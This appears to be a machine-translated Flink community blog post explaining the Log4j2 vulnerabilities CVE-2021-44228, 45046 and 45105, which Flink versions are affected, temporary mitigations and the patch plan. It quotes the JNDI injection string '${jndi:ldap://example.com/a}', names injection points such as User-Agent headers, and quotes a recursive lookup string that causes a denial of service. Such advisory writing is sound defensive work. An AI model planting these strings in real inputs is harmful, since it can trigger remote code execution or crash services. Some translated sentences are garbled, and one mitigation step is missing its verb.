头图

The author of this article, Yu Hangxiang & Li Yu, detailed the impact of the Log4j2 Zero Day vulnerability and the Flink community's response plan. The main contents include:

  1. Vulnerability description
  2. Flink users may be affected
  3. Affected Flink versions and temporary solutions
  4. Flink community repair plan

Overview

Apache Log4j is a Java-based logging tool. Apache Log4j2 rewrites Log4j and adds many rich features. Recently, Alibaba Cloud Security reported the Zero Day vulnerability of Apache log4j2 [1] . Based on this vulnerability, attackers can construct malicious requests and trigger remote code execution vulnerabilities. The vulnerability is currently CVE-2021-44228 [2] tracking. The Log4j team immediately released version 2.15.0 after discovering the problem, and provided a temporary solution.

On December 14, the team from Twitter discovered and reported a new vulnerability: CVE-2021-45046 [17] . This vulnerability means that the fix to CVE-2021-44228 in 2.15.0 and the temporary solution provided are not complete, and it can still be exploited to cause DOS attacks under certain configuration conditions. Subsequently, the Log4j team released the 2.16.0 version, and recommended the affected software to be upgraded to this version, and gave a new temporary solution.

The range of affected versions of the above vulnerabilities is 2.0-beta9 <= log4j2 <= 2.12.1 and 2.13.0 <= log4j2 <= 2.15.0. Apache Flink uses Log4j 1.x in version 1.10 and earlier, which can be considered unaffected. Log4j 2.x version is used in 1.11 and above, and they are all in the affected range.

On December 16, a new vulnerability issue related to Apache Log4j was raised [18] . After verification, CVE-2021-45105 [19] was released on December 18. The vulnerability further indicates that the 2.16.0 version and the temporary fix for CVE-2021-45046 are still at risk of being attacked by DOS under certain configuration conditions. Subsequently, the Log4j team immediately released version 2.17.0 and gave a new temporary repair plan.

The affected versions of the above vulnerabilities range from 2.0-beta9 to 2.16.0.

Next, we will first briefly explain the details and impact of the vulnerability, and then specifically explain the possible impact of the vulnerability on Flink users, and finally, we will introduce in detail the temporary solutions that Flink users can adopt to the vulnerability and the repair plan of the Flink community.

1. Vulnerability description

CVE-2021-44228

This vulnerability can be traced back to a Feature introduced by Log4j in the early years. In 2013, Log4j added the "JNDILookup plugin" [4] function in the 2.0-beta9 version [3]

Java introduced JNDI as a directory service after 1990, allowing Java programs to look up data in the directory in the form of Java objects. JNDI provides a variety of SPI to support different directory services, such as CORBA COS (Common Object Service), Java RMI (Remote Method Interface) Registry and LDAP (Lightweight Directory Access Protocol). These are all services that may be exploited by CVE-2021-44228/45046 vulnerabilities.
Java programs can use JNDI and LDAP in combination to find Java objects that contain data that may be needed. For example, there is an example in the standard Java document that communicates with an LDAP server to retrieve object attributes. That is, use the URL "ldap://localhost:389/o=JNDITutorial" to find the JNDITutorial object from the LDAP server running on the same machine (localhost) with port 389, and continue to read the attributes from it.
According to the official JNDI help document, "If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL", the LDAP server can be run on a different machine or on any Internet Local operation. This flexibility means that if an attacker can control the LDAP URL, they can make the Java program load the object from the server they control.

In the version of Log4j that contains vulnerabilities, an attacker can control the LDAP URL accessed by Log4j by passing a string similar to "${jndi:ldap://example.com/a}". In this case, Log4j will connect to the LDAP server on example.com and retrieve the object.

Log4j has a special grammatical explanation for the "${prefix:name}" form. The prefix is one of the various Lookups<sup>[5]</sup> provided by Log4j, and the name corresponds to the one under the Lookup. Kind of execution attributes. For example, ${java:version} is the currently running Java version.
The JndiLookup added by LOG4J-313 provides the ability to retrieve variables through JNDI. By default, the key will be prefixed in the form of "java:comp/env/". But when the key itself contains additional ":" , the correct prefix form cannot be parsed. For example, when the string "${jndi:ldap://example.com/a}" is passed in, Log4j will not detect the correct prefix. Due to the Message Lookup mechanism, its behavior will be to query the target object in the LDAP server.

Therefore, the attacker only needs to find an input that may be printed and add a string like "${jndi:ldap://example.com/a}" to it. For example, the attacker may insert the attack string into the HTTP header like User-Agent, the form parameter like username, etc.

This approach is very common in Java-based Internet-oriented applications. What's more stifling is may be passed from one system to another, causing non-Internet-oriented applications that use Java to be tricked.

For example, a string of User-Agent exploiting the vulnerability can be passed to a back-end system written in Java. The system may build index or data analysis based on the vulnerability data, and the vulnerability data may also be used by Log4j in these processes. Printing, and then cause serious impact. Therefore, all Java-based software that uses Log4j2 should be patched immediately, otherwise the potential threat is great. Even if Internet-facing software is not written in Java, malicious strings may be passed to other systems written in Java and cause serious problems. For example, a accounting system written based on Java, it may print the customer's name when it can't find it. The attacker can create an order containing the customer's name of the vulnerability information, and the vulnerability information is likely to be transmitted in the Web server and database system and finally enter the billing system, and all systems in the link may be affected.

In addition, Java is used in many other scenarios in addition to being used in Internet-oriented systems. For example, a QR code on a parcel processing system or an electronic key for a contactless door. If they are written in Java and use Log4j, they are all likely to be attacked. A carefully crafted QR code may contain a postal address for vulnerability information, and a carefully coded electronic key may contain a malicious program exploiting the vulnerability to directly track our entry and exit records.

There are also some systems that contain timed tasks that may not immediately process the vulnerability information. The vulnerability may remain dormant until the timed task is summarized and archived and the malicious string is printed. The vulnerability will be triggered and have a serious impact after several hours or even days.

CVE-2021-45046

This vulnerability was discovered by Twitter. The 2.15.0 version's fix for CVE-2021-44228 and the previous suggestions made by the Log4j team cannot completely avoid the impact of this vulnerability. The reason is that when some non-default Pattern Layout (Context lookup or Thread Context Map pattern) is used in the log configuration, attackers can use this pattern to inject malicious data.

If the above Pattern Layout exists in the log configuration, the scheme based on “log4j2.formatMsgNoLookups=true” cannot prevent malicious data from using JndiLookup to trigger CVE-2021-44228. Even if the scope of JNDI LDAP Lookup is restricted to Localhost in 2.15.0, it is still Will face the risk of DOS attacks.

CVE-2021-45105

This vulnerability shows that Log4j 2.16.0 version based on the CVE-2021-45046 fix and temporary solution still has the risk of being attacked by DOS. The reason is that when a non-default Pattern Layout such as Context lookup is used in the log configuration (such as $${ctx:loginId} ), an attacker can add malicious data (such as ${${::-${::-$${::-j}}}} ) to the Thread Context Map to trigger an endless loop of Lookup, which is further caused by StackOverflowError Cause the process to terminate.

If the above Pattern Layout exists in the log configuration, the scheme based on "log4j2.formatMsgNoLookups=true" and "remove JndiLookup.class" cannot prevent malicious data from triggering CVE-2021-45105, because the root cause of the vulnerability occurred in the String Substitution process .

2. Flink users may be affected

Using Flink version 1.11 and above will be affected by this vulnerability. As mentioned in the previous chapter, although Flink is not directly facing the Internet in most usage scenarios, the attack string may be directly transmitted to Flink from other systems (even if other systems have taken some precautions) and be transferred to Flink. and the Record-related printing operation in this process will trigger the vulnerability (in fact, this printing operation is very common in practical applications), which will cause serious impact.

img

Taking common log analysis scenarios as an example, we often see the operation of printing the relevant information of the Record in the UDF, when the attack string (such as ${jndi:ldap://example.com/a}) is passed from Kafka to Flink When processed by these UDFs, the nodes in the job execution environment will be directly affected. On the one hand, similar message transmission is not restricted by the encryption and decryption of message transmission (UDF will decode first when processing encrypted messages). On the other hand, it does not require Flink job submission permission and can be directly injected upstream. Therefore, the Flink system, especially for the execution environment that has access to the external network and lacks the ability to isolate secure containers, poses a high threat.

3. Affected Flink versions and temporary solutions

The current log4j version details used by each released version of Flink are as follows:

img

It can be seen that Flink uses the 2.x Log4j version for versions 1.11 and above, so all will be affected, and versions 1.10 and below can be considered unaffected. At present, the community has actively responded to repair the problem, and the detailed repair plan will be introduced in the next chapter.

Before the community has released the corresponding repair version, it needs to be solved by the latest suggestion of the Log4j team.

If the community has released the repaired version corresponding to Log4j 2.17.0, users can directly upgrade to the latest version, stop and restart the operation to avoid these vulnerabilities.

If the Flink version used in the current job is the version corresponding to Log4j 2.16.0 (ie 1.14.2, 1.13.5, 1.12.7, 1.11.6), there are two solutions:

  1. In the PatternLayout of the log configuration, ${ctx:loginId} or $${ctx:loginId} with the Thread Context Map mode (such as %X, %mdc, or %MDC )
  2. In the log configuration, completely remove ${ctx:loginId} or $${ctx:loginId} (the core is still that malicious data can be injected in this mode and analyzed by Log4j)

If the Flink version used in the current operation is Log4j 2.15.0 or earlier versions (ie 1.14.1, 1.13.4, 1.12.5, 1.11.4 and earlier versions), in addition to the above operations, Also need to use:

 zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Delete the JndiLooup.class in log4j-core that Flink relies on to achieve the effect of disabling JNDI in 2.16.0.

Need to pay attention to the following three points:

  1. The repair process needs to stop the job and restart after the repair is completed.
  2. For the Zero Day problem of Apache Log4j, although there were other temporary solutions [6] [7] , currently only the above methods can completely avoid the impact of this vulnerability.
  3. It is recommended to batch upgrade to the corresponding version as soon as possible after the repaired version is released in the community.

4. Flink community restoration plan

At present, Log4j has released 2.15.0, 2.16.0 and 2.17.0 versions. The specific fixes are as follows:

img

After learning about this vulnerability, the Flink community immediately discussed the repair plan [14] , the community first upgraded the version of Log4j in the master branch to 2.15.0, and at the same time picked the fix to 1.14.1, 1.13.4, 1.12 .5, 1.11.4 [12] , these versions have been released, users can directly use, for example:
https://search.maven.org/artifact/org.apache.flink/flink-core/1.14.1/jar

However, considering that the 2.16.0 version of Log4j can solve the problem more thoroughly, the community further upgraded the version of Log4j in the master branch to 2.16.0, and pick the fix to 1.14.2, 1.13.5, 1.12.7, 1.11 .6 [13] . At present, these new versions of the vote has been completed, I believe will be completed as soon as possible publish [14] [15] [16] .

Currently, plans for the corresponding repair version of Log4j 2.17.0 are under discussion [20] [21] . After the Flink community releases the various repaired versions corresponding to Log4j 2.17.0, users only need to upgrade the Flink version used in the job to completely avoid this problem.

Reference

[1] Apache Log4j Vulnerability Details and Mitigation

https://www.cyberkendra.com/2021/12/apache-log4j-vulnerability-details-and.html

[2] CVE-2021-44228

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

[3] Apache Log4j 2.0-beta9 released

https://blogs.apache.org/logging/entry/apache_log4j_2_0_beta9

[4] LOG4J2-313

https://issues.apache.org/jira/browse/LOG4J2-313

[5] LOG4J Lookups

https://logging.apache.org/log4j/2.x/manual/lookups.html

[6] Advise on Apache Log4j Zero Day (CVE-2021-44228)

https://flink.apache.org/2021/12/10/log4j-cve.html

[7] CVE-2021-44228 Solution

https://stackoverflow.com/questions/70315727/where-to-put-formatmsgnolookups-in-log4j-xml-config-file/70315902#70315902

[8] LOG4J2-3198

https://issues.apache.org/jira/browse/LOG4J2-3198

[9] LOG4J2-3201

https://issues.apache.org/jira/browse/LOG4J2-3201

[10] LOG4J2-3208

https://issues.apache.org/jira/browse/LOG4J2-3208

[11] LOG4J2-3211

https://issues.apache.org/jira/browse/LOG4J2-3211

[12] Update log4j2 version to 2.15.0

https://issues.apache.org/jira/browse/FLINK-25240

[13] Update Log4j to 2.16.0

https://issues.apache.org/jira/browse/FLINK-25295

[14] [DISCUSS] Immediate dedicated Flink releases for log4j vulnerability

https://lists.apache.org/thread/j15t1lwp84ph7ftjdhpw4429zgl13588

[15] [VOTE] Release 1.11.5/1.12.6/1.13.4/1.14.1, release candidate #1

https://lists.apache.org/thread/64tn3d38ko4hqc9blxdhqrh27x3fjro8

[16] [VOTE] Release 1.11.6/1.12.7/1.13.5/1.14.2, release candidate #1

https://lists.apache.org/thread/3yn7ps0ogdkr1r5zdjp10zftwcpr1hqn

[17] CVE-2021-45046

https://nvd.nist.gov/vuln/detail/CVE-2021-45046

[18] LOG4J2-3230

https://issues.apache.org/jira/browse/LOG4J2-3230

[19] CVE-2021-45105

https://nvd.nist.gov/vuln/detail/CVE-2021-45105

[20] CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

https://lists.apache.org/thread/6gxlmk0zo9qktz1dksmnq6j0fttfqgno

[21] FLINK-25375

https://issues.apache.org/jira/browse/FLINK-25375


ApacheFlink
946 声望1.1k 粉丝